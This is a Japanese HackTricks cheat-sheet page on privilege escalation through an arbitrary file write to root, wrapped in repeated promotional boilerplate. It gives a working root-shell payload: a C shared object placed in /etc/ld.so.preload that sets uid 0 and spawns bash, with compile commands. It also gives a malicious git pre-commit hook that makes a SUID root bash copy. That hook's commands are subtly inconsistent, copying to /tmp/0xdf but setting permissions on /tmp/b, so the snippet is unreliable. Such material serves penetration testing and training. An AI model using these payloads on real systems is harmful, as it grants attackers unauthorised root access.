ルートへの任意のファイル書き込み

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksグッズを手に入れましょう。
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

/etc/ld.so.preload

このファイルは、LD_PRELOAD 環境変数と同様に動作しますが、SUIDバイナリでも機能します。
作成または変更できる場合、実行されるバイナリごとにロードされるライブラリのパスを追加するだけです。

例: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Gitフック

Gitフックは、gitリポジトリでさまざまなイベント（コミットの作成、マージなど）が発生したときに実行されるスクリプトです。したがって、特権スクリプトまたはユーザーがこれらのアクションを頻繁に実行し、.gitフォルダに書き込むことができる場合、これを使用して特権昇格が可能です。

たとえば、新しいコミットが作成されるたびに常に実行されるように、gitリポジトリの.git/hooksにスクリプトを生成することができます：

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

{% endcode %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

あなたはサイバーセキュリティ会社で働いていますか？ HackTricksであなたの会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください、私たちの独占的なNFTのコレクション
公式のPEASS＆HackTricksのグッズを手に入れましょう
💬 Discordグループまたはtelegramグループに参加するか、Twitterで私をフォローしてください🐦@carlospolopm.
ハッキングのトリックを共有するために、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

5 KiB Raw Blame History Unescape Escape

ルートへの任意のファイル書き込み

/etc/ld.so.preload

Gitフック

5 KiB

Raw Blame History